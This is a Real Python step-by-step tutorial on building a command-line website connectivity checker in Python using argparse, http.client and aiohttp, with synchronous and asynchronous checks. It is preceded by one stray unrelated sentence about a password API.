- This way the Passowrd API is never going to know our full hash and never ever be able to guess our password.
Watch Now This tutorial has a related video course created by the Real Python team. Watch it together with the written tutorial to deepen your understanding: Building a Site Connectivity Checker
Building a site connectivity checker in Python is an interesting project to level up your skills. With this project, you’ll integrate knowledge related to handling HTTP requests, creating command-line interfaces (CLI), and organizing your application’s code using common Python project layout practices.
By building this project, you’ll learn how Python’s asynchronous features can help you deal with multiple HTTP requests efficiently.
In this tutorial, you’ll learn how to:
- Create command-line interfaces (CLI) using Python’s
argparse
- Check if a website is online using Python’s
http.client
from the standard library - Implement synchronous checks for multiple websites
- Check if a website is online using the
aiohttp
third-party library - Implement asynchronous checks for multiple websites
To get the most out of this project, you need to know the basics of handling HTTP requests and using argparse
to create CLIs. You should also be familiar with the asyncio
module and the async
and await
keywords.
But don’t worry! The topics throughout the tutorial will be introduced in a step-by-step fashion so that you can grasp them as you go. Additionally, you can download the complete source code and other resources for this project by clicking the link below:
Demo: A Site Connectivity Checker
In this step-by-step project, you’ll build an application that checks if one or more websites are online at a given moment. The app will take a list of target URLs at the command line and check them for connectivity either synchronously or asynchronously. The following video shows how the app works:
Your site connectivity checker can take one or more URLs at the command line. Then it creates an internal list of target URLs and checks them for connectivity by issuing HTTP requests and processing the corresponding responses.
Using the -a
or --asynchronous
option makes the application perform the connectivity checks asynchronously, potentially resulting in lower execution times, especially when you’re processing a long list of websites.
Project Overview
Your website connectivity checker app will provide a few options through a minimal command-line interface (CLI). Here’s a summary of these options:
-u
or--urls
allows you to provide one or more target URLs at the comment line.-f
or--input-file
allows you to supply a file containing a list of URLs to check.-a
or--asynchronous
allows you to run the connectivity checks asynchronously.
By default, your application will run the connectivity checks synchronously. In other words, the app will perform the checks one after another.
With the -a
or --asynchronous
option, you can modify this behavior and make the app run the connectivity checks concurrently. To do this, you’ll take advantage of Python’s asynchronous features and the aiohttp
third-party library.
Running asynchronous checks can make your website connectivity checker faster and more efficient, especially when you have a long list of URLs to check.
Internally, your application will use the standard-library http.client
module to create a connection to the target website. Once you have a connection, then you can make an HTTP request to the website, which will hopefully react with an appropriate response. If the request is successful, then you’ll know that the site is online. Otherwise, you’ll know that the site is offline.
To display the result of every connectivity check on your screen, you’ll provide your app with a nicely formatted output that will make the app appealing to your users.
Prerequisites
The project that you’ll build in this tutorial will require familiarity with general Python programming. Additionally, it’ll require basic knowledge of the following topics:
- Handling exceptions in Python
- Working with files, the
with
statement, and thepathlib
module - Handling HTTP requests with standard-library or third-party tools
- Creating CLI applications with the
argparse
module - Using Python’s asynchronous features
Knowing the basics of the aiohttp
third-party library would also be a plus but not a requirement. However, if you don’t have all this knowledge yet, then that’s okay! You might learn more by going ahead and giving the project a shot. You can always stop and review the resources linked here if you get stuck.
With this short overview of your website connectivity checker project and the prerequisites, you’re almost ready to start Pythoning and having fun while coding. But first, you need to create a suitable working environment and set up your project’s layout.
Step 1: Set Up Your Site Connectivity Checker Project in Python
In this section, you’ll get ready to start coding your site connectivity checker app. You’ll start by creating a Python virtual environment for the project. This environment will allow you to isolate the project and its dependencies from other projects and your system Python installation.
The next step is to set up the project’s layout by creating all the required files and the directory structure.
To download the code for this first step, click the following link and navigate to the source_code_step_1/
folder:
Set Up the Development Environment
Before you start coding a new project, you should do some preparation. In Python, you typically start by creating a virtual environment for the project. A virtual environment provides an isolated Python interpreter and a space to install your project’s dependencies.
To kick things off, go ahead and create the project’s root directory, called rpchecker_project/
. Then move to this directory and run the following commands on your system’s command line or terminal:
- Windows
- Linux + macOS
PS> python -m venv venv
PS> venvScriptsactivate
(venv) PS>
$ python -m venv venv
$ source venv/bin/activate
(venv) $
The first command creates a fully functional Python virtual environment called venv
inside the project’s root directory, while the second command activates the environment. Now run the following command to install the project’s dependencies with pip
, the standard Python package manager:
(venv) $ python -m pip install aiohttp
With this command, you install aiohttp
into your virtual environment. You’ll use this third-party library along with Python’s async
features to handle asynchronous HTTP requests in your site connectivity checker app.
Cool! You have a working Python virtual environment with all the dependencies that you’ll need to start building your project. Now you can create the project’s layout to organize your code following Python best practices.
Organize Your Site Connectivity Checker Project
Python is surprisingly flexible when it comes to structuring applications, so you may find pretty different structures from project to project. However, small installable Python projects typically have a single package, which is often named after the project itself.
Following this practice, you can organize your site connectivity checker app using the following directory structure:
rpchecker_project/
│
├── rpchecker/
│ ├── __init__.py
│ ├── __main__.py
│ ├── checker.py
│ └── cli.py
│
├── README.md
└── requirements.txt
You can use any name for this project and its main package. In this tutorial, the project will be named rpchecker
as a combination of Real Python (rp
) and checker
, which points out the app’s main functionality.
The README.md
file will contain the project’s description and instructions for installing and running the application. Adding a README.md
file to your projects is a best practice in programming, especially if you’re planning to release the project as an open source solution. To learn more about writing good README.md
files, check out How to write a great README for your GitHub project.
The requirements.txt
file will hold the list of your project’s external dependencies. In this case, you only need the aiohttp
library, because the rest of the tools and modules that you’ll use are available out of the box in the Python standard library. You can use this file to automatically reproduce the appropriate Python virtual environment for your app using pip
, the standard package manager.
Inside the rpchecker/
directory, you’ll have the following files:
__init__.py
enablesrpchecker/
as a Python package.__main__.py
works as an entry-point script for the app.checker.py
provides the application’s core functionalities.cli.py
contains the command-line interface for the application.
Now go ahead and create all these files as empty files. You can do this by using your favorite code editor or IDE. Once you finish creating the project’s layout, then you can start coding the app’s main functionality: checking if a website is online or not.
Step 2: Check Websites’ Connectivity in Python
At this point, you should have a suitable Python virtual environment with your project’s dependencies installed in it. You should also have a project directory containing all the files that you’ll use throughout this tutorial. It’s time to start coding!
Before jumping into the really fun stuff, go ahead and add the application’s version number to the __init__.py
module in your rpchecker
package:
# __init__.py
__version__ = "0.1.0"
The __version__
module-level constant holds your project’s current version number. Because you’re creating a brand-new app, the initial version is set to 0.1.0
. With this minimal setup, you can start implementing the connectivity-checking functionality.
To download the code for this step, click the following link and look inside the source_code_step_2/
folder:
Implement a Connectivity Checker Function
There are several Python tools and libraries that you can use to check if a website is online at a given time. For example, a popular option is the requests
third-party library, which allows you to perform HTTP requests using a human-readable API.
However, using requests
has the drawback of installing an external library just to use a minimal part of its functionality. It’d be more efficient to find an appropriate tool in the Python standard library.
With a quick look at the standard library, you’ll find the urllib
package, which provides several modules for handling HTTP requests. For example, to check if a website is online, you can use the urlopen()
function from the urllib.request
module:
>>>
>>> from urllib.request import urlopen
>>> response = urlopen("https://python.org")
>>> response.read()
b'<!doctype html>n<!--[if lt IE 7]>
...
The urlopen()
function takes a URL and opens it, returning its content as a string or a Request
object. But you just need to check if the website is online, so downloading the entire page would be wasteful. You need something more efficient.
What about a tool that gives you lower-level control over your HTTP request? That’s where the http.client
module comes in. This module provides the HTTPConnection
class, representing a connection to a given HTTP server.
HTTPConnection
has a .request()
method that allows you to perform HTTP requests using the different HTTP methods. For this project, you can use the HEAD
HTTP method to ask for a response containing only the headers of the target website. This option will reduce the amount of data to download, making your connectivity checker app more efficient.
At this point, you have a clear idea of the tool to use. Now you can do some quick tests. Go ahead and run the following code in a Python interactive session:
>>>
>>> from http.client import HTTPConnection
>>> connection = HTTPConnection("pypi.org", port=80, timeout=10)
>>> connection.request("HEAD", "/")
>>> response = connection.getresponse()
>>> response.getheaders()
[('Server', 'Varnish'), ..., ('X-Permitted-Cross-Domain-Policies', 'none')]
In this example, you first create an HTTPConnection
instance targeting the pypi.org
website. The connection uses port 80
, which is the default HTTP port. Finally, the timeout
argument provides the number of seconds to wait before timing out connection attempts.
Then you perform a HEAD
request on the site’s root path, "/"
, using .request()
. To get the actual response from the server, you call .getresponse()
on the connection
object. Finally, you inspect the response’s headers by calling .getheaders()
.
Your website connectivity checker just needs to create a connection and make a HEAD
request. If the request is successful, then the target website is online. Otherwise, the site is offline. In the latter case, it’d be appropriate to display an error message to the user.
Now go ahead and open the checker.py
file in your code editor. Then add the following code to it:
1# checker.py
2
3from http.client import HTTPConnection
4from urllib.parse import urlparse
5
6def site_is_online(url, timeout=2):
7 """Return True if the target URL is online.
8
9 Raise an exception otherwise.
10 """
11 error = Exception("unknown error")
12 parser = urlparse(url)
13 host = parser.netloc or parser.path.split("/")[0]
14 for port in (80, 443):
15 connection = HTTPConnection(host=host, port=port, timeout=timeout)
16 try:
17 connection.request("HEAD", "/")
18 return True
19 except Exception as e:
20 error = e
21 finally:
22 connection.close()
23 raise error
Here’s a breakdown of what this code does line by line:
-
Line 3 imports
HTTPConnection
fromhttp.client
. You’ll use this class to establish a connection with the target website and handle HTTP requests. -
Line 4 imports
urlparse()
fromurllib.parse
. This function will help you parse the target URLs. -
Line 6 defines
site_is_online()
, which takes aurl
and atimeout
argument. Theurl
argument will hold a string representing a website’s URL. Meanwhile,timeout
will hold the number of seconds to wait before timing out connection attempts. -
Line 11 defines a generic
Exception
instance as a placeholder. -
Line 12 defines a
parser
variable containing the result of parsing the target URL usingurlparse()
. -
Line 13 uses the
or
operator to extract the hostname from the target URL. -
Line 14 starts a
for
loop over the HTTP and HTTPS ports. This way, you can check if the website is available on either port. -
Line 15 creates an
HTTPConnection
instance usinghost
,port
, andtimeout
as arguments. -
Lines 16 to 22 define a
try
…except
…finally
statement. Thetry
block attempts to make aHEAD
request to the target website by calling.request()
. If the request succeeds, then the function returnsTrue
. If an exception occurs, then theexcept
block keeps a reference to that exception inerror
. Thefinally
block closes the connection to free the acquired resources. -
Line 23 raises the exception stored in
error
if the loop finishes without a successful request.
Your site_is_online()
function returns True
if the target website is available online. Otherwise, it raises an exception pointing out the problem it encountered. This latter behavior is convenient because you need to show an informative error message when the site isn’t online. Now it’s time to try out your new function.
Run Your First Connectivity Checks
To try out your site_is_online()
function, go ahead and get back to your interactive session. Then run the following code:
>>>
>>> from rpchecker.checker import site_is_online
>>> site_is_online("python.org")
True
>>> site_is_online("non-existing-site.org")
Traceback (most recent call last):
...
socket.gaierror: [Errno -2] Name or service not known
In this code snippet, you first import site_is_online()
from the checker
module. Then you call the function with "python.org"
as an argument. Because the function returns True
, you know that the target site is online.
In the final example, you call site_is_online()
with a non-existing website as a target URL. In this case, the function raises an exception that you can later catch and process to display an error message to the user.
Great! You’ve implemented the application’s main functionality of checking a website’s connectivity. Now you can continue with your project by setting up its CLI.
Step 3: Create Your Website Connectivity Checker’s CLI
So far, you have a working function that allows you to check if a given website is online by performing an HTTP request using the http.client
module from the standard library. At the end of this step, you’ll have a minimal CLI that will allow you to run your website connectivity checker app from the command line.
The CLI will include options for taking a list of URLs at the command line and loading a list of URLs from a text file. The application will also display the connectivity check results with a user-friendly message.
To create the application’s CLI, you’ll use argparse
from the Python standard library. This module allows you to build user-friendly CLIs without installing any external dependencies, such as Click or Typer.
To get started, you’ll write the required boilerplate code for working with argparse
. You’ll also code the option to read URLs from the command line.
Click the link below to download the code for this step so that you can follow along with the project. You’ll find what you need in the source_code_step_3/
folder:
Parse Website URLs at the Command Line
To build the application’s CLI with argparse
, you need to create an ArgumentParser
instance so that you can parse arguments provided at the command line. Once you have an argument parser, then you can start adding arguments and options to your app’s CLI.
Now go ahead and open the cli.py
file in your code editor. Then add the following code:
# cli.py
import argparse
def read_user_cli_args():
"""Handle the CLI arguments and options."""
parser = argparse.ArgumentParser(
prog="rpchecker", description="check the availability of websites"
)
parser.add_argument(
"-u",
"--urls",
metavar="URLs",
nargs="+",
type=str,
default=[],
help="enter one or more website URLs",
)
return parser.parse_args()
In this code snippet, you create read_user_cli_args()
to keep the functionality related to the argument parser in a single place. To build the parser object, you use two arguments:
prog
defines the program’s name.description
provides a suitable description for the application. This description will be displayed when you call the app with the--help
option.
After creating the argument parser, you add a first command-line argument using .add_argument()
. This argument will allow the user to enter one or more URLs at the command line. It’ll use the -u
and --urls
switches.
The rest of the arguments to .add_argument()
work as follows:
metavar
sets a name for the argument in usage or help messages.nargs
tellsargparse
to accept a list of command-line arguments after the-u
or--urls
switch.type
sets the data type of the command-line arguments, which isstr
in this argument.default
sets the command-line argument to an empty list by default.help
provides a help message for the user.
Finally, your function returns the result of calling .parse_args()
on the parser object. This method returns a Namespace
object containing the parsed arguments.
Load Website URLs From a File
Another valuable option to implement in your site connectivity checker is the ability to load a list of URLs from a text file on your local machine. To do this, you can add a second command-line argument with the -f
and --input-file
flags.
Go ahead and update read_user_cli_args()
with the following code:
# cli.py
# ...
def read_user_cli_args():
# ...
parser.add_argument(
"-f",
"--input-file",
metavar="FILE",
type=str,
default="",
help="read URLs from a file",
)
return parser.parse_args()
To create this new command-line argument, you use .add_argument()
with almost the same arguments as in the section above. In this case, you aren’t using the nargs
argument, because you want the application to accept only one input file at the command line.
Display the Check Results
An essential component of every application that interacts with the user through the command line is the application’s output. Your application needs to show the result of its operations to the user. This feature is vital for ensuring a pleasant user experience.
Your site connectivity checker doesn’t need a very complex output. It just needs to inform the user about the current status of the checked websites. To implement this functionality, you’ll code a function called display_check_result()
.
Now get back to the cli.py
file and add the function at the end:
# cli.py
# ...
def display_check_result(result, url, error=""):
"""Display the result of a connectivity check."""
print(f'The status of "{url}" is:', end=" ")
if result:
print('"Online!" 👍')
else:
print(f'"Offline?" 👎 n Error: "{error}"')
This function takes the connectivity check result, the checked URL, and an optional error message. The conditional statement tests to see if result
is true, in which case an "Online!"
message is printed to the screen. If result
is false, then the else
clause prints "Offline?"
along with an error report about the actual problem that has just occurred.
That’s it! Your website connectivity checker has a command-line interface to allow the user to interact with the application. Now it’s time to put everything together in the application’s entry-point script.
Step 4: Put Everything Together in the App’s Main Script
So far, your site connectivity checker project has a function that checks if a given website is online. It also has a CLI that you quickly built using the argparse
module from the Python standard library. In this step, you’ll write the glue code—the code that will bring all these components together and make your application work as a full-fledged command-line app.
To kick things off, you’ll start by setting up the application’s main script or entry-point script. This script will contain the main()
function and some high-level code that will help you connect the CLI in the front-end with the connectivity-checking functionality in the back-end.
To download the code for this step, click the link below, then check out the source_code_step_4/
folder:
Create the Application’s Entry-Point Script
The next step in building your website connectivity checker app is to define the entry-point script with a suitable main()
function. To do this, you’ll use the __main__.py
file that lives in the rpchecker
package. Including a __main__.py
file in a Python package enables you to run the package as an executable program using the command python -m <package_name>
.
To start populating __main__.py
with code, go ahead and open the file in your code editor. Then add the following:
1# __main__.py
2
3import sys
4
5from rpchecker.cli import read_user_cli_args
6
7def main():
8 """Run RP Checker."""
9 user_args = read_user_cli_args()
10 urls = _get_websites_urls(user_args)
11 if not urls:
12 print("Error: no URLs to check", file=sys.stderr)
13 sys.exit(1)
14 _synchronous_check(urls)
After importing read_user_cli_args()
from the cli
module, you define the app’s main()
function. Inside main()
, you’ll find a few lines of code that don’t work yet. Here’s what this code should do after you provide the missing functionality:
-
Line 9 calls
read_user_cli_args()
to parse the command-line arguments. The resultingNamespace
object is then stored in theuser_args
local variable. -
Line 10 puts together a list of target URLs by calling a helper function named
_get_websites_urls()
. You’ll be coding this function in a moment. -
Line 11 defines an
if
statement to check if the list of URLs is empty. If that’s the case, then theif
block prints an error message to the user and exits the application. -
Line 14 invokes a function called
_synchronous_check()
, which takes the list of target URLs as an argument and runs the connectivity check over each URL. As the name points out, this function will run the connectivity checks synchronously, or one after the other. Again, you’ll be coding this function in a moment.
With main()
in place, you can start coding the missing pieces to make it work correctly. In the following sections, you implement _get_websites_urls()
and _synchronous_check()
. Once they’re ready to go, you’ll be able to run your website connectivity checker app for the first time.
Build the List of Target Website URLs
Your site connectivity checker app will be able to check multiple URLs in every execution. Users will feed URLs into the app by listing them at the command line, providing them in a text file, or both. To create the internal list of target URLs, the app will first process URLs provided at the command line. Then it’ll add additional URLs from a file, if any.
Here’s the code that accomplishes these tasks and returns a list of target URLs that combines both sources, the command line and an optional text file:
1# __main__.py
2
3import pathlib
4import sys
5
6from rpchecker.cli import read_user_cli_args
7
8def main():
9 # ...
10
11def _get_websites_urls(user_args):
12 urls = user_args.urls
13 if user_args.input_file:
14 urls += _read_urls_from_file(user_args.input_file)
15 return urls
16
17def _read_urls_from_file(file):
18 file_path = pathlib.Path(file)
19 if file_path.is_file():
20 with file_path.open() as urls_file:
21 urls = [url.strip() for url in urls_file]
22 if urls:
23 return urls
24 print(f"Error: empty input file, {file}", file=sys.stderr)
25 else:
26 print("Error: input file not found", file=sys.stderr)
27 return []
The first update in this code snippet is to import pathlib
to manage the path to the optional URLs file. The second update is to add the _get_websites_urls()
helper function, which does the following:
-
Line 12 defines
urls
, which initially stores the list of URLs provided at the command line. Note that if the user doesn’t supply any URLs, thenurls
will store an empty list. -
Line 13 defines a conditional that checks if the user has provided a URLs file. If so, then the
if
block augments the list of target URLs resulting from calling_read_urls_from_file()
with the file provided in theuser_args.input_file
command-line argument. -
Line 15 returns the resulting list of URLs.
At the same time, _read_urls_from_file()
runs the following actions:
-
Line 18 turns the
file
argument into apathlib.Path
object to facilitate further processing. -
Line 19 defines a conditional statement that checks if the current file is an actual file in the local file system. To perform this check, the conditional calls
.is_file()
on thePath
object. Then theif
block opens the file and reads its content using a list comprehension. This comprehension strips any possible leading and ending whitespace from every line in the file to prevent processing errors later. -
Line 22 defines a nested conditional to check if any URL has been gathered. If so, then line 23 returns the resulting list of URLs. Otherwise, line 24 prints an error message to inform the reader that the input file is empty.
The else
clause on lines 25 to 26 prints an error message to point out that the input file doesn’t exit. If the function runs without returning a valid list of URLs, it returns an empty list.
Wow! That was a lot, but you made it to the end! Now you can continue with the final part of __main__.py
. In other words, you can implement the _synchronous_check()
function so that the app can perform connectivity checks on multiple websites.
Check the Connectivity of Multiple Websites
To run connectivity checks over multiple websites, you need to iterate through the list of target URLs, do the checks, and display the corresponding results. That’s what the _synchronous_check()
function below does:
1# __main__.py
2
3import pathlib
4import sys
5
6from rpchecker.checker import site_is_online
7from rpchecker.cli import display_check_result, read_user_cli_args
8
9# ...
10
11def _synchronous_check(urls):
12 for url in urls:
13 error = ""
14 try:
15 result = site_is_online(url)
16 except Exception as e:
17 result = False
18 error = str(e)
19 display_check_result(result, url, error)
20
21if __name__ == "__main__":
22 main()
In this piece of code, you first update your imports by adding site_is_online()
and display_check_result()
. Then you define _synchronous_check()
, which takes a list of URLs as arguments. The function’s body works like this:
-
Line 12 starts a
for
loop that iterates over the target URLs. -
Line 13 defines and initializes
error
which will hold the message that will be displayed if the app doesn’t get a response from the target website. -
Lines 14 to 18 define a
try
…except
statement that catches any exception that may occur during the connectivity checks. These checks run on line 15, which callssite_is_online()
with the target URL as an argument. Then lines 17 and 18 update theresult
anderror
variables if a connection problem happens. -
Line 19 finally calls
display_check_result()
with appropriate arguments to display the connectivity check result to the screen.
To wrap up the __main__.py
file, you add the typical Python if __name__ == "__main__":
boilerplate code. This snippet calls main()
when the module is run as a script or executable program. With these updates, your application is now ready for a test flight!
Run Connectivity Checks From the Command Line
You’ve written a ton of code without having the chance to see it in action. You’ve coded the site connectivity checker’s CLI and its entry-point script. Now it’s time to give your application a try. Before doing that, make sure you’ve downloaded the bonus material mentioned at the beginning of this step, especially the sample-urls.txt
file.
Now get back to your command line and execute the following commands:
$ python -m rpchecker -h
python -m rpchecker -h
usage: rpchecker [-h] [-u URLs [URLs ...]] [-f FILE] [-a]
check the availability of web sites
options:
-h, --help show this help message and exit
-u URLs [URLs ...], --urls URLs [URLs ...]
enter one or more website URLs
-f FILE, --input-file FILE
read URLs from a file
$ python -m rpchecker -u python.org pypi.org peps.python.org
The status of "python.org" is: "Online!" 👍
The status of "pypi.org" is: "Online!" 👍
The status of "peps.python.org" is: "Online!" 👍
$ python -m rpchecker --urls non-existing-site.org
The status of "non-existing-site.org" is: "Offline?" 👎
Error: "[Errno -2] Name or service not known"
$ cat sample-urls.txt
python.org
pypi.org
docs.python.org
peps.python.org
$ python -m rpchecker -f sample-urls.txt
The status of "python.org" is: "Online!" 👍
The status of "pypi.org" is: "Online!" 👍
The status of "docs.python.org" is: "Online!" 👍
The status of "peps.python.org" is: "Online!" 👍
Your website connectivity checker works great! When you run rpchecker
with the -h
or --help
option, you get a usage message that explains how to use the app.
The application can take several URLs at the command line or from a text file and check them for connectivity. If an error occurs during the check, then you get a message on the screen with information about what’s causing the error.
Go ahead a try some other URLs and features. For example, try to combine URLs at the command line with URLs from a file using the -u
and -f
switches. Additionally, check what happens when you provide a URLs file that’s empty or nonexistent.
Cool! Your site connectivity checker app works nicely and smoothly, doesn’t it? However, it has a hidden issue. The execution time can be overwhelming when you run the application with a long list of target URLs, because all the connectivity checks run synchronously.
To work around this issue and improve the application’s performance, you can implement asynchronous connectivity checks. That’s what you’ll do in the following section.
Step 5: Check Websites’ Connectivity Asynchronously
By performing the connectivity checks on multiple websites concurrently through asynchronous programming, you can improve the overall performance of your application. To do this, you can take advantage of Python’s asynchronous features and the aiohttp
third-party library, which you already have installed in your project’s virtual environment.
Python supports asynchronous programming with the asyncio
module and the async
and await
keywords. In the following sections, you’ll write the required code to make your app run the connectivity checks asynchronously using these tools.
To download the code for this final step, click the following link and look into the source_code_step_5/
folder:
Implement an Asynchronous Connectivity Checker Function
The first step in the process of making your website connectivity checker work concurrently is to write an async
function that allows you to perform a single connectivity check on a given website. This will be the asynchronous equivalent to your site_is_online()
function.
Get back to the checker.py
file and add the following code:
1# checker.py
2
3import asyncio
4from http.client import HTTPConnection
5from urllib.parse import urlparse
6
7import aiohttp
8# ...
9
10async def site_is_online_async(url, timeout=2):
11 """Return True if the target URL is online.
12
13 Raise an exception otherwise.
14 """
15 error = Exception("unknown error")
16 parser = urlparse(url)
17 host = parser.netloc or parser.path.split("/")[0]
18 for scheme in ("http", "https"):
19 target_url = scheme + "://" + host
20 async with aiohttp.ClientSession() as session:
21 try:
22 await session.head(target_url, timeout=timeout)
23 return True
24 except asyncio.exceptions.TimeoutError:
25 error = Exception("timed out")
26 except Exception as e:
27 error = e
28 raise error
In this update, you first add the required imports, asyncio
and aiohttp
. Then you define site_is_online_async()
on line 10. It’s an async
function that takes two arguments: the URL to check and the number of seconds before the requests time out. The function’s body does the following:
-
Line 15 defines a generic
Exception
instance as a placeholder. -
Line 16 defines a
parser
variable containing the result of parsing the target URL usingurlparse()
. -
Line 17 uses the
or
operator to extract the hostname from the target URL. -
Line 18 defines a
for
loop over the HTTP and HTTPS schemes. This will allow you to check if the website is available on either one. -
Line 19 builds a URL using the current scheme and the hostname.
-
Line 20 defines an
async with
statement to handle anaiohttp.ClientSession
instance. This class is the recommended interface for making HTTP requests withaiohttp
. -
Lines 21 to 27 define a
try
…except
statement. Thetry
block performs and awaits aHEAD
request to the target website by calling.head()
on thesession
object. If the request succeeds, then the function returnsTrue
. The firstexcept
clause catchesTimeoutError
exceptions and setserror
to a newException
instance. The secondexcept
clause catches any other exceptions and updates theerror
variable accordingly. -
Line 28 raises the exception stored in
error
if the loop finishes without a successful request.
This implementation of site_is_online_async()
is similar to the implementation of site_is_online()
. It returns True
if the target website is online. Otherwise, it raises an exception pointing out the encountered problem.
The main difference between these functions is that site_is_online_async()
performs the HTTP requests asynchronously using the aiohttp
third-party library. This distiction can help you optimize your app’s performance when you have a long list of websites to check.
With this function in place, you can proceed to update your application’s CLI with a new option that allows you to run the connectivity checks asynchronously.
Add an Asynchronous Option to the Application’s CLI
Now you need to add an option to your site connectivity checker app’s CLI. This new option will tell the app to run the checks asynchronously. The option can just be a Boolean flag. To implement this type of option, you can use the action
argument of .add_argument()
.
Now go ahead and update read_user_cli_args()
on the cli.py
file with the following code:
# cli.py
# ...
def read_user_cli_args():
"""Handles the CLI user interactions."""
# ...
parser.add_argument(
"-a",
"--asynchronous",
action="store_true",
help="run the connectivity check asynchronously",
)
return parser.parse_args()
# ...
This call to .add_argument()
on the parser
object adds a new -a
or --asynchronous
option to the application’s CLI. The action
argument is set to "store_true"
, which tells argparse
that -a
and --asynchronous
are Boolean flags that will store True
when provided at the command line.
With this new option in place, it’s time to write the logic for checking the connectivity of multiple websites asynchronously.
Check the Connectivity of Multiple Websites Asynchronously
To check the connectivity of multiple websites asynchronously, you’ll write an async
function that calls and awaits site_is_online_async()
from the checker
module. Get back to the __main__.py
file and add the following code to it:
1# __main__.py
2import asyncio
3import pathlib
4import sys
5
6from rpchecker.checker import site_is_online, site_is_online_async
7from rpchecker.cli import display_check_result, read_user_cli_args
8# ...
9
10async def _asynchronous_check(urls):
11 async def _check(url):
12 error = ""
13 try:
14 result = await site_is_online_async(url)
15 except Exception as e:
16 result = False
17 error = str(e)
18 display_check_result(result, url, error)
19
20 await asyncio.gather(*(_check(url) for url in urls))
21
22def _synchronous_check(urls):
23 # ...
In this piece of code, you first update your imports to access site_is_online_async()
. Then you define _asynchronous_check()
on line 10 as an asynchronous function using the async
keyword. This function takes a list of URLs and checks their connectivity asynchronously. Here’s how it does that:
-
Line 11 defines an inner
async
function called_check()
. This function allows you to reuse the code that checks a single URL for connectivity. -
Line 12 defines and initializes a placeholder
error
variable, which will be used in the call todisplay_check_result()
later. -
Lines 13 to 17 define a
try
…except
statement to wrap the connectivity check. Thetry
block calls and awaitssite_is_online_async()
with the target URL as an argument. If the call succeeds, thenresult
ends up beingTrue
. If the call raises an exception, thenresult
will beFalse
, anderror
will hold the resulting error message. -
Line 18 calls
display_check_result()
usingresult
,url
, anderror
as arguments. This call displays information about the website’s availability. -
Line 20 calls and awaits the
gather()
function from theasyncio
module. This function runs a list of awaitable objects concurrently and returns an aggregated list of resulting values if all the awaitable objects complete successfully. To provide the list of awaitable objects, you use a generator expression that calls_check()
for each target URL.
Okay! You’re almost ready to try out the asynchronous capabilities of your site connectivity checker app. Before doing that, you need to take care of a final detail: updating the main()
function to integrate this new feature.
Add Asynchronous Checks to the App’s Main Code
To add the asynchronous functionality to your application’s main()
function, you’ll use a conditional statement to check if the user provided the -a
or --asynchronous
flag at the command line. This conditional will allow you to run the connectivity checks with the right tool according to the user’s input.
Go ahead and open the __main__.py
file again. Then update main()
like in the following code snippet:
1# __main__.py
2# ...
3
4def main():
5 """Run RP Checker."""
6 user_args = read_user_cli_args()
7 urls = _get_websites_urls(user_args)
8 if not urls:
9 print("Error: no URLs to check", file=sys.stderr)
10 sys.exit(1)
11
12 if user_args.asynchronous:
13 asyncio.run(_asynchronous_check(urls))
14 else:
15 _synchronous_check(urls)
16
17# ...
The conditional statement on lines 12 to 15 checks if the user has provided the -a
or --asynchronous
flag at the command line. If that’s the case, main()
runs the connectivity checks asynchronously using asyncio.run()
. Otherwise, it runs the checks synchronously using _synchronous_check()
.
That’s it! You can now test this new feature of your website connectivity checker in practice. Get back to your command line and run the following:
$ python -m rpchecker -h
usage: rpchecker [-h] [-u URLs [URLs ...]] [-f FILE] [-a]
check the availability of web sites
options:
-h, --help show this help message and exit
-u URLs [URLs ...], --urls URLs [URLs ...]
enter one or more website URLs
-f FILE, --input-file FILE
read URLs from a file
-a, --asynchronous run the connectivity check asynchronously
$ # Synchronous execution
$ python -m rpchecker -u python.org pypi.org docs.python.org
The status of "python.org" is: "Online!" 👍
The status of "pypi.org" is: "Online!" 👍
The status of "docs.python.org" is: "Online!" 👍
$ # Asynchronous execution
$ python -m rpchecker -u python.org pypi.org docs.python.org -a
The status of "pypi.org" is: "Online!" 👍
The status of "docs.python.org" is: "Online!" 👍
The status of "python.org" is: "Online!" 👍
The first command shows that your application now has a new -a
or --asynchronous
option that will run the connectivity checks asynchronously.
The second command makes rpchecker
run the connectivity checks synchronously, just like you did in the previous section. This is because you don’t provide the -a
or --asynchronous
flags. Note that the URLs are checked in the same order that they’re entered at the command line.
Finally, in the third command, you use the -a
flag at the end of the line. This flag makes rpchecker
run the connectivity checks concurrently. Now the check results aren’t displayed in the same order as the URLs are entered but in the order in which the responses come from the target websites.
As an exercise, you can try to run your site connectivity checker application with a long list of target URLs and compare the execution time when the app runs the checks synchronously and asynchronously.
Conclusion
You’ve built a functional site connectivity checker application in Python. Now you know the basics of handling HTTP requests to a given website. You also learned how to create a minimal yet functional command-line interface (CLI) for your application and how to organize a real-world Python project. Additionally, you’ve tried out Python’s asynchronous features.
In this tutorial, you learned how to:
- Create command-line interfaces (CLI) in Python with
argparse
- Check if a website is online using Python’s
http.client
- Run synchronous checks on multiple websites
- Check if a website is online using
aiohttp
- Check the connectivity of multiple websites asynchronously
With this foundation, you’re ready to continue leveling up your skills by creating more complex command-line applications. You’re also better prepared to continue learning about HTTP requests with Python.
To review what you’ve done to build your app, you can download the complete source code below:
Next Steps
Now that you’ve finished building your site connectivity checker application, you can go a step further by implementing a few additional features. Adding new features by yourself will push you to learn about new and exciting coding concepts and topics.
Here are some ideas for new features:
- Timing support: Measure the response time of every target website.
- Check-scheduling support: Schedule multiple rounds of connectivity checks in case some websites are offline.
To implement these features, you can take advantage of Python’s time
module, which will allow you to measure the execution time of your code.
Once you implement these new features, then you can change gears and jump into other cool and more complex projects. Here are some great next steps for you to continue learning Python and building projects:
-
Build a Dice-Rolling Application With Python: In this step-by-step project, you’ll build a dice-rolling simulator app with a minimal text-based user interface using Python. The app will simulate the rolling of up to six dice. Each individual die will have six sides.
-
Raining Outside? Build a Weather CLI App With Python: In this tutorial, you’ll write a nicely formatted Python CLI app that displays information about the current weather in any city that you provide the name for.
-
Build a Python Directory Tree Generator for the Command Line: In this step-by-step project, you’ll create a Python directory tree generator application for your command line. You’ll code the command-line interface with
argparse
and traverse the file system usingpathlib
. -
Build a Command-Line To-Do App With Python and Typer: In this step-by-step project, you’ll create a to-do application for your command line using Python and Typer. While you build this app, you’ll learn the basics of Typer, a modern and versatile library for building command-line interfaces (CLIs).
Watch Now This tutorial has a related video course created by the Real Python team. Watch it together with the written tutorial to deepen your understanding: Building a Site Connectivity Checker